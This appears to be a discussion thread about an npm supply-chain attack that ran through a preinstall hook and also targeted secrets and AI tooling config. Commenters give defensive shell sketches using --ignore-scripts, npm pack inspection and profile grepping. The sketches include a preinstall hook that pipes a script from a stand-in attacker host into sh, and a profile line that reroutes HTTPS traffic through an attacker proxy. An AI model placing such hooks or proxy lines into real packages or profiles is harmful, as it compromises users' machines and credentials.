The part that seems most important here is that npm install was enough.
Once the compromise point is preinstall, the usual "inspect after install" mindset breaks down. By then the payload has already had a chance to run.
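To make that concrete, here is a minimal sketch of the attack shape (the package name and URL are invented): the `preinstall` hook below would fire the moment `npm install` resolves this package, before anyone has read a line of its code.

```shell
# Hypothetical malicious package: the preinstall lifecycle script runs
# automatically during `npm install`, before any inspection can happen.
mkdir -p demo-pkg
cat > demo-pkg/package.json <<'EOF'
{
  "name": "demo-pkg",
  "version": "1.0.0",
  "scripts": {
    "preinstall": "curl -s https://attacker.example/x | sh"
  }
}
EOF
# The blunt mitigation is to never run lifecycle scripts at all:
#   npm install --ignore-scripts
#   npm config set ignore-scripts true
grep preinstall demo-pkg/package.json
```

`ignore-scripts=true` in a project `.npmrc` is the usual way to make this stick for automated/CI installs, at the cost of breaking packages that legitimately need a build step.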
That gets more interesting with agents / CI / ephemeral sandboxes, because short exposure windows are still enough when installs happen automatically and repeatedly.
Another thing I think is worth paying attention to: this payload did not just target secrets, it also went after AI tooling config. There is a real possibility that shell-profile tampering becomes a way to poison what the next coding assistant reads into context.
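As a toy illustration of that last point (the file name and injected line are invented, not from the actual payload): one appended line in a shell profile is enough to change what any tool that sources the shell, an agent included, sees in its environment.

```shell
# Simulated tampered profile: a single injected export reroutes traffic
# for anything launched from this shell (attacker host is hypothetical).
printf 'export HTTPS_PROXY="http://attacker.example:8080"\n' > fake_profile
# A cheap tamper check: grep profiles for network-touching lines.
grep -nE 'curl|wget|base64|PROXY' fake_profile
```

A real check would diff `~/.bashrc`, `~/.zshrc`, etc. against a known-good baseline rather than pattern-matching, but the point stands: profiles are writable state that downstream tools trust implicitly.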
I work on AgentSH (https://www.agentsh.org), and we wrote up a longer take on that angle here:
Nobody inspects packages after install; that theory has been debunked multiple times. Caring about npm install running scripts is moot when you'll inevitably run the actual binary after install anyway.
And besides, you could always pull the package and inspect it before running install. Unless you really know the installer and deeply understand its guarantees (e.g., whether an install can deploy files outside of node_modules), it's insane to even vaguely trust it to pull and unpack potentially malicious code.
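For what it's worth, "pull and inspect first" can be done without ever running install: `npm pack <pkg>` downloads the tarball without executing hooks, and plain `tar` can read it. A sketch (the package name is made up, and the tarball is simulated locally so nothing is fetched):

```shell
# Simulate what `npm pack suspect@1.0.0` would leave in the cwd:
# a tarball whose top-level directory is "package/".
mkdir -p package
printf '{ "scripts": { "preinstall": "echo pwned" } }\n' > package/package.json
tar -czf suspect-1.0.0.tgz package
# Inspect with tar alone -- nothing is unpacked, nothing runs:
tar -tzf suspect-1.0.0.tgz                        # list every file
tar -xOzf suspect-1.0.0.tgz package/package.json  # read manifest to stdout
```

Checking the `scripts` field of the packed `package.json` this way catches the preinstall/postinstall vector specifically, though of course not malicious code that only runs when you later import the package.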